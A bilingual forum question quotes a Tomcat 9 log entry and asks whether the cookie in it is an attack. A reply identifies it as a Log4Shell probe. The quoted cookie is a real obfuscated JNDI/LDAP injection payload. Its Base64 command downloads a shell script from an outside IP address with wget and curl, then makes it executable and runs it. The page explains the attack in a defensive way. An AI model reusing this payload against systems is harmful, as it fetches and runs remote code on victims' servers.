Tomcat 9:cookie 攻击?
来自 Tomcat9 catalina 日志:
org.apache.tomcat.util.http.parser.Cookie.logInvalidHeader A cookie
header was received [('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-
l}dap${env:BARFOO:-:}//ip:1389/TomcatBypass/Command/Base64/Y2QgL3
RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaH
R0cDovLzE2Ny45OS40OS4xMzIvOFVzQS5zaDsgY3VybCAtTyBodHRwOi8vMTY3Ljk5LjQ5LjEzMi
84VXNBLnNoOyBjaG1vZCA3NzcgOFVzQS5zaDsgc2ggOFVzQS5zaA==}')] that contained an
invalid cookie. That cookie will be ignored.
cookie 是什么?这是攻击吗?
From Tomcat9 catalina log:
org.apache.tomcat.util.http.parser.Cookie.logInvalidHeader A cookie
header was received [('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-
l}dap${env:BARFOO:-:}//ip:1389/TomcatBypass/Command/Base64/Y2QgL3
RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaH
R0cDovLzE2Ny45OS40OS4xMzIvOFVzQS5zaDsgY3VybCAtTyBodHRwOi8vMTY3Ljk5LjQ5LjEzMi
84VXNBLnNoOyBjaG1vZCA3NzcgOFVzQS5zaDsgc2ggOFVzQS5zaA==}')] that contained an
invalid cookie. That cookie will be ignored.
What is the cookie? Is it an attack?
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(1)
这是针对 Log4Shell 攻击对您的安装进行的探测。
默认情况下,Tomcat 不会受到攻击。
但如果您(在您的自定义 Web 应用程序中)使用易受攻击的 log4j 版本,您仍然可能会受到攻击。
This is a probe of your installation for the Log4Shell attack.
By default - Tomcat is immune to the attack.
But you could still could be subject to the attack if you (in your custom webapp) use an vulnerable log4j version.